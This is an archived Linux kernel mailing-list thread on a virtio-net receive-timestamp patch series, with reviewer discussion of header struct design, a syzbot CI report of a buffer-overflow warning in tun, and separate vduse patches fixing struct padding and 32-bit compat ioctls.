+ if (virtio_net_hdr_tnl_from_skb(skb, &hdr->tnl, vi->tx_tnl,
virtio_is_little_endian(vi->vdev), 0,
false))
return -EPROTO;
if (vi->mergeable_rx_bufs)
- hdr->hash_hdr.hdr.num_buffers = 0;
+ hdr->tnl.hash_hdr.hdr.num_buffers = 0;
sg_init_table(sq->sg, skb_shinfo(skb)->nr_frags + (can_push ? 1 : 2));
if (can_push) {
@@ -5563,6 +5599,22 @@ static int virtnet_get_per_queue_coalesce(struct net_device *dev,
return 0;
}
+static int virtnet_get_ts_info(struct net_device *dev,
+ struct kernel_ethtool_ts_info *info)
+{
+ /* setup default software timestamp */
+ ethtool_op_get_ts_info(dev, info);
+
+ info->rx_filters = (BIT(HWTSTAMP_FILTER_NONE) |
+ BIT(HWTSTAMP_FILTER_PTP_V1_L4_SYNC) |
+ BIT(HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ) |
+ BIT(HWTSTAMP_FILTER_ALL));
+
+ info->tx_types = HWTSTAMP_TX_OFF;
+
+ return 0;
+}
+
static void virtnet_init_settings(struct net_device *dev)
{
struct virtnet_info *vi = netdev_priv(dev);
@@ -5658,7 +5710,7 @@ static const struct ethtool_ops virtnet_ethtool_ops = {
.get_ethtool_stats = virtnet_get_ethtool_stats,
.set_channels = virtnet_set_channels,
.get_channels = virtnet_get_channels,
- .get_ts_info = ethtool_op_get_ts_info,
+ .get_ts_info = virtnet_get_ts_info,
.get_link_ksettings = virtnet_get_link_ksettings,
.set_link_ksettings = virtnet_set_link_ksettings,
.set_coalesce = virtnet_set_coalesce,
@@ -6242,6 +6294,58 @@ static void virtnet_tx_timeout(struct net_device *dev, unsigned int txqueue)
jiffies_to_usecs(jiffies - READ_ONCE(txq->trans_start)));
}
+static int virtnet_hwtstamp_get(struct net_device *dev,
+ struct kernel_hwtstamp_config *tstamp_config)
+{
+ struct virtnet_info *vi = netdev_priv(dev);
+
+ if (!netif_running(dev))
+ return -EINVAL;
+
+ *tstamp_config = vi->tstamp_config;
+
+ return 0;
+}
+
+static int virtnet_hwtstamp_set(struct net_device *dev,
+ struct kernel_hwtstamp_config *tstamp_config,
+ struct netlink_ext_ack *extack)
+{
+ struct virtnet_info *vi = netdev_priv(dev);
+
+ if (!netif_running(dev))
+ return -EINVAL;
+
+ switch (tstamp_config->rx_filter) {
+ case HWTSTAMP_FILTER_PTP_V1_L4_SYNC:
+ case HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ:
+ break;
+ case HWTSTAMP_FILTER_PTP_V2_EVENT:
+ case HWTSTAMP_FILTER_PTP_V2_L2_EVENT:
+ case HWTSTAMP_FILTER_PTP_V2_L4_EVENT:
+ case HWTSTAMP_FILTER_PTP_V2_SYNC:
+ case HWTSTAMP_FILTER_PTP_V2_L2_SYNC:
+ case HWTSTAMP_FILTER_PTP_V2_L4_SYNC:
+ case HWTSTAMP_FILTER_PTP_V2_DELAY_REQ:
+ case HWTSTAMP_FILTER_PTP_V2_L2_DELAY_REQ:
+ case HWTSTAMP_FILTER_PTP_V2_L4_DELAY_REQ:
+ tstamp_config->rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+ break;
+ case HWTSTAMP_FILTER_NONE:
+ break;
+ case HWTSTAMP_FILTER_ALL:
+ tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL;
+ break;
+ default:
+ tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL;
+ return -ERANGE;
+ }
+
+ vi->tstamp_config = *tstamp_config;
+
+ return 0;
+}
+
static int virtnet_init_irq_moder(struct virtnet_info *vi)
{
u8 profile_flags = 0, coal_flags = 0;
@@ -6289,6 +6393,8 @@ static const struct net_device_ops virtnet_netdev = {
.ndo_get_phys_port_name = virtnet_get_phys_port_name,
.ndo_set_features = virtnet_set_features,
.ndo_tx_timeout = virtnet_tx_timeout,
+ .ndo_hwtstamp_set = virtnet_hwtstamp_set,
+ .ndo_hwtstamp_get = virtnet_hwtstamp_get,
};
static void virtnet_config_changed_work(struct work_struct *work)
@@ -6911,6 +7017,9 @@ static int virtnet_probe(struct virtio_device *vdev)
if (virtio_has_feature(vdev, VIRTIO_NET_F_HASH_REPORT))
vi->has_rss_hash_report = true;
+ if (virtio_has_feature(vdev, VIRTIO_NET_F_TSTAMP))
+ vi->has_tstamp = true;
+
if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS)) {
vi->has_rss = true;
@@ -6945,8 +7054,10 @@ static int virtnet_probe(struct virtio_device *vdev)
dev->xdp_metadata_ops = &virtnet_xdp_metadata_ops;
}
- if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) ||
- virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO))
+ if (vi->has_tstamp)
+ vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts);
+ else if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) ||
+ virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO))
vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel);
else if (vi->has_rss_hash_report)
vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash);
@@ -7269,7 +7380,8 @@ static struct virtio_device_id id_table[] = {
VIRTIO_NET_F_SPEED_DUPLEX, VIRTIO_NET_F_STANDBY, \
VIRTIO_NET_F_RSS, VIRTIO_NET_F_HASH_REPORT, VIRTIO_NET_F_NOTF_COAL, \
VIRTIO_NET_F_VQ_NOTF_COAL, \
- VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS
+ VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS, \
+ VIRTIO_NET_F_TSTAMP
static unsigned int features[] = {
VIRTNET_FEATURES,
diff --git a/include/uapi/linux/virtio_net.h b/include/uapi/linux/virtio_net.h
index 1db45b01532b5..9f967575956b8 100644
--- a/include/uapi/linux/virtio_net.h
+++ b/include/uapi/linux/virtio_net.h
@@ -56,6 +56,7 @@
#define VIRTIO_NET_F_MQ 22 /* Device supports Receive Flow
* Steering */
#define VIRTIO_NET_F_CTRL_MAC_ADDR 23 /* Set MAC address */
+#define VIRTIO_NET_F_TSTAMP 49 /* Device sends TAI receive time */
#define VIRTIO_NET_F_DEVICE_STATS 50 /* Device can provide device-level statistics. */
#define VIRTIO_NET_F_VQ_NOTF_COAL 52 /* Device supports virtqueue notification coalescing */
#define VIRTIO_NET_F_NOTF_COAL 53 /* Device supports notifications coalescing */
@@ -215,6 +216,14 @@ struct virtio_net_hdr_v1_hash_tunnel {
__le16 inner_nh_offset;
};
+struct virtio_net_hdr_v1_hash_tunnel_ts {
+ struct virtio_net_hdr_v1_hash_tunnel tnl;
+ __le16 tstamp_0;
+ __le16 tstamp_1;
+ __le16 tstamp_2;
+ __le16 tstamp_3;
+};
+
#ifndef VIRTIO_NET_NO_LEGACY
/* This header comes first in the scatter-gather list.
* For legacy virtio, if VIRTIO_F_ANY_LAYOUT is not negotiated, it must
--
2.52.0
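The rx_filter switch in virtnet_hwtstamp_set() above accepts the two PTP v1 L4 filters as-is, coerces every PTP v2 variant down to a single event filter, and rejects anything else. A Python sketch of that normalization (filter names are shortened HWTSTAMP_FILTER_* constants; illustration only, not the driver code):

```python
# Model of the virtnet_hwtstamp_set() rx_filter switch from the patch.
# Names are shortened versions of the HWTSTAMP_FILTER_* constants.
V1_PASSTHROUGH = {"PTP_V1_L4_SYNC", "PTP_V1_L4_DELAY_REQ"}
V2_VARIANTS = {
    "PTP_V2_EVENT", "PTP_V2_L2_EVENT", "PTP_V2_L4_EVENT",
    "PTP_V2_SYNC", "PTP_V2_L2_SYNC", "PTP_V2_L4_SYNC",
    "PTP_V2_DELAY_REQ", "PTP_V2_L2_DELAY_REQ", "PTP_V2_L4_DELAY_REQ",
}

def normalize_rx_filter(requested):
    if requested in V1_PASSTHROUGH or requested == "NONE":
        return requested           # accepted unchanged
    if requested in V2_VARIANTS:
        return "PTP_V2_EVENT"      # all v2 variants coerced to one filter
    if requested == "ALL":
        return "ALL"
    raise ValueError("ERANGE")     # unsupported filter, like the default case
```

Note that the coercion target PTP_V2_EVENT is written back into the caller's config, matching the kernel convention that a driver may report a coarser filter than requested.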
|
{
"author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>",
"date": "Thu, 29 Jan 2026 09:06:42 +0100",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
|
On Thu, 29 Jan 2026 09:06:42 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote:
Since patch #1 uses this struct, this one should be placed first in the series.
Also, has the virtio specification process accepted such a draft proposal?
Thanks
|
{
"author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>",
"date": "Thu, 29 Jan 2026 17:48:25 +0800",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
|
Hi,
On 2026-01-29 at 17:48 +08, Xuan Zhuo <xuanzhuo@linux.alibaba.com> wrote:
oh, you are right, the order should be the other way around.
I haven't sent the draft yet, because I'm unsure if I understood the way this should be implemented with the flow filter correctly.
If the direction is correct, I'd try and get the specification process going again.
(That is not that easy, if you're not used to it and not that deep into the whole virtio universe ;))
Best regards,
Steffen
--
Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar |
Steuerwalder Str. 21 | https://www.pengutronix.de/ |
31137 Hildesheim, Germany | Phone: +49-5121-206917-0 |
Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
|
{
"author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>",
"date": "Thu, 29 Jan 2026 11:08:27 +0100",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
|
On Thu, 29 Jan 2026 11:08:27 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote:
There have been many historical attempts in this area; you may want to take a
look first.
Thanks.
|
{
"author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>",
"date": "Thu, 29 Jan 2026 19:03:15 +0800",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
|
syzbot ci has tested the following series
[v2] virtio-net: add flow filter for receive timestamps
https://lore.kernel.org/all/20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de
* [PATCH RFC v2 1/2] tun: support rx-tstamp
* [PATCH RFC v2 2/2] virtio-net: support receive timestamp
and found the following issue:
WARNING in __copy_overflow
Full report is available here:
https://ci.syzbot.org/series/0b35c8c9-603b-4126-ac04-0095faadb2f5
***
WARNING in __copy_overflow
tree: net-next
URL: https://kernel.googlesource.com/pub/scm/linux/kernel/git/netdev/net-next.git
base: ffeafa65b2b26df2f5b5a6118d3174f17bd12ec5
arch: amd64
compiler: Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
config: https://ci.syzbot.org/builds/d8316da2-2688-4d74-bbf4-e8412e24d106/config
C repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/c_repro
syz repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/syz_repro
------------[ cut here ]------------
Buffer overflow detected (32 < 1840)!
WARNING: mm/maccess.c:234 at __copy_overflow+0x17/0x30 mm/maccess.c:234, CPU#0: syz.0.17/5993
Modules linked in:
CPU: 0 UID: 0 PID: 5993 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__copy_overflow+0x1c/0x30 mm/maccess.c:234
Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 55 53 48 89 f3 89 fd e8 60 b1 c4 ff 48 8d 3d 39 25 d5 0d 89 ee 48 89 da <67> 48 0f b9 3a 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 90 90
RSP: 0018:ffffc90003b97888 EFLAGS: 00010293
RAX: ffffffff81fdcf50 RBX: 0000000000000730 RCX: ffff88810ccd9d40
RDX: 0000000000000730 RSI: 0000000000000020 RDI: ffffffff8fd2f490
RBP: 0000000000000020 R08: ffffffff8fcec777 R09: 1ffffffff1f9d8ee
R10: dffffc0000000000 R11: ffffffff81742230 R12: dffffc0000000000
R13: 0000000000000000 R14: 0000000000000730 R15: 1ffff92000772f30
FS: 00007f08c446a6c0(0000) GS:ffff88818e32d000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f08c4448ff8 CR3: 000000010cec2000 CR4: 00000000000006f0
Call Trace:
<TASK>
copy_overflow include/linux/ucopysize.h:41 [inline]
check_copy_size include/linux/ucopysize.h:50 [inline]
copy_to_iter include/linux/uio.h:219 [inline]
tun_put_user drivers/net/tun.c:2089 [inline]
tun_do_read+0x1f44/0x28a0 drivers/net/tun.c:2190
tun_chr_read_iter+0x13b/0x260 drivers/net/tun.c:2214
do_iter_readv_writev+0x619/0x8c0 fs/read_write.c:-1
vfs_readv+0x288/0x840 fs/read_write.c:1018
do_readv+0x154/0x2e0 fs/read_write.c:1080
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xe2/0xf80 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f08c359acb9
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f08c446a028 EFLAGS: 00000246 ORIG_RAX: 0000000000000013
RAX: ffffffffffffffda RBX: 00007f08c3815fa0 RCX: 00007f08c359acb9
RDX: 0000000000000002 RSI: 0000200000000080 RDI: 0000000000000003
RBP: 00007f08c3608bf7 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f08c3816038 R14: 00007f08c3815fa0 R15: 00007fff6491da78
</TASK>
----------------
Code disassembly (best guess):
0: 90 nop
1: 90 nop
2: 90 nop
3: 90 nop
4: 90 nop
5: 90 nop
6: 90 nop
7: 90 nop
8: 90 nop
9: 90 nop
a: 90 nop
b: 90 nop
c: 90 nop
d: 90 nop
e: f3 0f 1e fa endbr64
12: 55 push %rbp
13: 53 push %rbx
14: 48 89 f3 mov %rsi,%rbx
17: 89 fd mov %edi,%ebp
19: e8 60 b1 c4 ff call 0xffc4b17e
1e: 48 8d 3d 39 25 d5 0d lea 0xdd52539(%rip),%rdi # 0xdd5255e
25: 89 ee mov %ebp,%esi
27: 48 89 da mov %rbx,%rdx
* 2a: 67 48 0f b9 3a ud1 (%edx),%rdi <-- trapping instruction
2f: 5b pop %rbx
30: 5d pop %rbp
31: c3 ret
32: cc int3
33: cc int3
34: cc int3
35: cc int3
36: cc int3
37: cc int3
38: cc int3
39: cc int3
3a: cc int3
3b: cc int3
3c: cc int3
3d: cc int3
3e: 90 nop
3f: 90 nop
***
If these findings have caused you to resend the series or submit a
separate fix, please add the following tag to your commit message:
Tested-by: syzbot@syzkaller.appspotmail.com
---
This report is generated by a bot. It may contain errors.
syzbot ci engineers can be reached at syzkaller@googlegroups.com.
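The trapping call is the copy_to_iter(&hdr, vnet_hdr_sz, iter) added in patch 1/2: hdr is a fixed-size on-stack struct, while vnet_hdr_sz is user-controlled (TUNSETVNETHDRSZ), so a large configured header size reads past the struct, which the fortified copy check catches. A minimal Python model of the missing bound (the 32-byte size is taken from this report's build; illustration only):

```python
HDR_SIZE = 32  # sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts) in this build

def put_vnet_hdr(hdr: bytes, vnet_hdr_sz: int) -> bytes:
    """Model of copy_to_iter(&hdr, vnet_hdr_sz, iter) in tun_put_user():
    copying more bytes than the source struct holds is the overflow
    syzbot flagged ("32 < 1840"). The copy length must be clamped to
    the struct size, with any remaining header bytes zero-padded."""
    if vnet_hdr_sz > len(hdr):
        raise OverflowError(
            f"Buffer overflow detected ({len(hdr)} < {vnet_hdr_sz})!")
    return hdr[:vnet_hdr_sz]
```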
|
{
"author": "syzbot ci <syzbot+ci99a227ab2089b0fa@syzkaller.appspotmail.com>",
"date": "Thu, 29 Jan 2026 05:27:03 -0800",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
|
Steffen Trumtrar wrote:
Good to see this picked up. I would also still like to see support in
virtio-net for HW timestamp pass-through.
|
{
"author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>",
"date": "Sun, 01 Feb 2026 16:00:07 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
|
Steffen Trumtrar wrote:
This patch refers to a struct that does not exist yet, so this cannot
compile?
|
{
"author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>",
"date": "Sun, 01 Feb 2026 16:00:49 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
|
Steffen Trumtrar wrote:
Jason, Michael: creating a new struct for every field is not very
elegant. Is it time to find a more forward looking approach to
expanding with new fields? Like a TLV, or how netlink structs like
tcp_info are extended with support for legacy users that only use
a truncated struct?
It's fine to implement filters, but also fine to only support ALL or
NONE for simplicity.
In the end it probably depends on what the underlying physical device
supports.
Why the multiple fields, rather than a u64?
More broadly: can my old patchset be dusted off as is? Does it require
significant changes?
I only paused it at the time, because I did not have a real device
back-end that was going to support it.
|
{
"author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>",
"date": "Sun, 01 Feb 2026 16:05:54 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
On 2026-02-01 at 16:05 -05, Willem de Bruijn <willemdebruijn.kernel@gmail.com> wrote:
Yes, this gets complicated real fast and leads to really long calls for all the nested fields. If there is a different way, I'd prefer that.
Should have added a comment, but this is based on this patch
c3838262b824c71c145cd3668722e99a69bc9cd9
virtio_net: fix alignment for virtio_net_hdr_v1_hash
Changing alignment of header would mean it's no longer safe to cast a
2 byte aligned pointer between formats. Use two 16 bit fields to make
it 2 byte aligned as previously.
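As an illustration of that point, here is a minimal C sketch (hypothetical struct names; assumes the usual 4-byte alignment of u32 on mainstream ABIs) of why splitting a 32-bit field into two 16-bit halves keeps the header 2-byte aligned:

```c
#include <assert.h>
#include <stdint.h>

/* A u32 member raises the whole struct's alignment to 4 bytes, so casting
 * a pointer that is only guaranteed 2-byte aligned to this type would be
 * undefined behavior. */
struct hdr_with_u32 {
    uint16_t a;
    uint16_t b;
    uint32_t value;
};

/* Splitting the field into two u16 halves keeps the struct 2-byte aligned,
 * so the older 2-byte-aligned header pointer can still be cast between the
 * two formats safely. */
struct hdr_with_u16_pair {
    uint16_t a;
    uint16_t b;
    uint16_t value_lo;
    uint16_t value_hi;
};
```

Both layouts occupy the same 8 bytes; only the required alignment differs.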
This is the dusted off version ;) With the flow filter it should be possible to turn the timestamps on and off during runtime.
Best regards,
Steffen
--
Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar |
Steuerwalder Str. 21 | https://www.pengutronix.de/ |
31137 Hildesheim, Germany | Phone: +49-5121-206917-0 |
Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
|
{
"author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>",
"date": "Mon, 02 Feb 2026 08:34:58 +0100",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
On Sun, Feb 01, 2026 at 04:05:54PM -0500, Willem de Bruijn wrote:
I certainly wouldn't mind, though I suspect tlv is too complex as
hardware implementations can't efficiently follow linked lists. I'll
try to ping some hardware designers for what works well for offloads.
|
{
"author": "\"Michael S. Tsirkin\" <mst@redhat.com>",
"date": "Mon, 2 Feb 2026 02:59:31 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
Michael S. Tsirkin wrote:
Great thanks.
Agreed that TLV was probably the wrong suggestion.
We can definitely have a required order of fields. My initial thought
is as said like many user/kernel structures: where both sides agree on
the basic order of the struct, and pass along the length, so that they
agree only to process the min of both their supported lengths. New
fields are added at the tail of the struct. See for instance getsockopt
TCP_INFO.
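The scheme described above can be sketched in a few lines of C (hypothetical struct and function names): both sides share a fixed field order, new fields are appended only at the tail, and each side processes the minimum of the two lengths, as getsockopt(TCP_INFO) does:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical v1 of a shared structure: fields in a fixed, agreed order. */
struct stats_v1 {
    unsigned int rx_packets;
    unsigned int tx_packets;
};

/* v2 extends only at the tail, so a v1 reader still understands the prefix. */
struct stats_v2 {
    unsigned int rx_packets;
    unsigned int tx_packets;
    unsigned long long rx_tstamp; /* new field, appended at the end */
};

/* Copy min(producer length, consumer length) bytes; each side supplies the
 * size of the struct version it was compiled against. */
static size_t copy_stats(void *dst, size_t dst_len,
                         const void *src, size_t src_len)
{
    size_t n = dst_len < src_len ? dst_len : src_len;

    memcpy(dst, src, n);
    return n;
}
```

A v2 producer talking to a v1 consumer simply truncates at the v1 boundary; neither side needs to know the other's version explicitly.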
|
{
"author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>",
"date": "Mon, 02 Feb 2026 12:40:36 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
From: Arnd Bergmann <arnd@arndb.de>
The vduse_iova_range_v2 and vduse_iotlb_entry_v2 structures are both
defined in a way that adds implicit padding and is incompatible between
i386 and x86_64 userspace because of the different structure alignment
requirements. Building the header with -Wpadded shows these new warnings:
vduse.h:305:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
vduse.h:374:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
Change the amount of padding in these two structures to align them to
64 bit words and avoid those problems. Since the v1 vduse_iotlb_entry
already has an inconsistent size, do not attempt to reuse the structure
but rather list the members indiviudally, with a fixed amount of
padding.
Fixes: 079212f6877e ("vduse: add vq group asid support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 40 +++++++++++-------------------
include/uapi/linux/vduse.h | 9 +++++--
2 files changed, 21 insertions(+), 28 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 73d1d517dc6c..405d59610f76 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1301,7 +1301,7 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
int r = -EINVAL;
struct vhost_iotlb_map *map;
- if (entry->v1.start > entry->v1.last || entry->asid >= dev->nas)
+ if (entry->start > entry->last || entry->asid >= dev->nas)
return -EINVAL;
asid = array_index_nospec(entry->asid, dev->nas);
@@ -1312,18 +1312,18 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
spin_lock(&dev->as[asid].domain->iotlb_lock);
map = vhost_iotlb_itree_first(dev->as[asid].domain->iotlb,
- entry->v1.start, entry->v1.last);
+ entry->start, entry->last);
if (map) {
if (f) {
const struct vdpa_map_file *map_file;
map_file = (struct vdpa_map_file *)map->opaque;
- entry->v1.offset = map_file->offset;
+ entry->offset = map_file->offset;
*f = get_file(map_file->file);
}
- entry->v1.start = map->start;
- entry->v1.last = map->last;
- entry->v1.perm = map->perm;
+ entry->start = map->start;
+ entry->last = map->last;
+ entry->perm = map->perm;
if (capability) {
*capability = 0;
@@ -1363,14 +1363,8 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
break;
ret = -EFAULT;
- if (cmd == VDUSE_IOTLB_GET_FD2) {
- if (copy_from_user(&entry, argp, sizeof(entry)))
- break;
- } else {
- if (copy_from_user(&entry.v1, argp,
- sizeof(entry.v1)))
- break;
- }
+ if (copy_from_user(&entry, argp, _IOC_SIZE(cmd)))
+ break;
ret = -EINVAL;
if (!is_mem_zero((const char *)entry.reserved,
@@ -1385,19 +1379,13 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
if (!f)
break;
- if (cmd == VDUSE_IOTLB_GET_FD2)
- ret = copy_to_user(argp, &entry,
- sizeof(entry));
- else
- ret = copy_to_user(argp, &entry.v1,
- sizeof(entry.v1));
-
+ ret = copy_to_user(argp, &entry, _IOC_SIZE(cmd));
if (ret) {
ret = -EFAULT;
fput(f);
break;
}
- ret = receive_fd(f, NULL, perm_to_file_flags(entry.v1.perm));
+ ret = receive_fd(f, NULL, perm_to_file_flags(entry.perm));
fput(f);
break;
}
@@ -1603,16 +1591,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
} else if (info.asid >= dev->nas)
break;
- entry.v1.start = info.start;
- entry.v1.last = info.last;
+ entry.start = info.start;
+ entry.last = info.last;
entry.asid = info.asid;
ret = vduse_dev_iotlb_entry(dev, &entry, NULL,
&info.capability);
if (ret < 0)
break;
- info.start = entry.v1.start;
- info.last = entry.v1.last;
+ info.start = entry.start;
+ info.last = entry.last;
info.asid = entry.asid;
ret = -EFAULT;
diff --git a/include/uapi/linux/vduse.h b/include/uapi/linux/vduse.h
index faae7718bd2e..deca8c7b9178 100644
--- a/include/uapi/linux/vduse.h
+++ b/include/uapi/linux/vduse.h
@@ -299,9 +299,13 @@ struct vduse_iova_info {
* Structure used by VDUSE_IOTLB_GET_FD2 ioctl to find an overlapped IOVA region.
*/
struct vduse_iotlb_entry_v2 {
- struct vduse_iotlb_entry v1;
+ __u64 offset;
+ __u64 start;
+ __u64 last;
+ __u8 perm;
+ __u8 padding[7];
__u32 asid;
- __u32 reserved[12];
+ __u32 reserved[11];
};
/*
@@ -371,6 +375,7 @@ struct vduse_iova_range_v2 {
__u64 start;
__u64 last;
__u32 asid;
+ __u32 padding;
};
/**
--
2.39.5
|
From: Arnd Bergmann <arnd@arndb.de>
These two ioctls are incompatible on 32-bit x86 userspace, because
the data structures are shorter than they are on 64-bit.
Add compad handling to the regular ioctl handler to just handle
them the same way and ignore the extra padding. This could be
done in a separate .compat_ioctl handler, but the main one already
handles two versions of VDUSE_IOTLB_GET_FD, so adding a third one
fits in rather well.
Fixes: ad146355bfad ("vduse: Support querying information of IOVA regions")
Fixes: c8a6153b6c59 ("vduse: Introduce VDUSE - vDPA Device in Userspace")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 43 +++++++++++++++++++++++++++---
1 file changed, 40 insertions(+), 3 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 405d59610f76..39cbff2f379d 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1341,6 +1341,37 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
return r;
}
+#if defined(CONFIG_X86_64) && defined(CONFIG_COMPAT)
+/*
+ * i386 has different alignment constraints than x86_64,
+ * so there are only 3 bytes of padding instead of 7.
+ */
+struct compat_vduse_iotlb_entry {
+ compat_u64 offset;
+ compat_u64 start;
+ compat_u64 last;
+ __u8 perm;
+ __u8 padding[__alignof__(compat_u64) - 1];
+};
+#define COMPAT_VDUSE_IOTLB_GET_FD _IOWR(VDUSE_BASE, 0x10, struct compat_vduse_iotlb_entry)
+
+struct compat_vduse_vq_info {
+ __u32 index;
+ __u32 num;
+ compat_u64 desc_addr;
+ compat_u64 driver_addr;
+ compat_u64 device_addr;
+ union {
+ struct vduse_vq_state_split split;
+ struct vduse_vq_state_packed packed;
+ };
+ __u8 ready;
+ __u8 padding[__alignof__(compat_u64) - 1];
+} __uapi_arch_align;
+#define COMPAT_VDUSE_VQ_GET_INFO _IOWR(VDUSE_BASE, 0x15, struct compat_vduse_vq_info)
+
+#endif
+
static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
unsigned long arg)
{
@@ -1352,6 +1383,9 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
return -EPERM;
switch (cmd) {
+#if defined(CONFIG_X86_64) && defined(CONFIG_COMPAT)
+ case COMPAT_VDUSE_IOTLB_GET_FD:
+#endif
case VDUSE_IOTLB_GET_FD:
case VDUSE_IOTLB_GET_FD2: {
struct vduse_iotlb_entry_v2 entry = {0};
@@ -1455,13 +1489,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
ret = 0;
break;
}
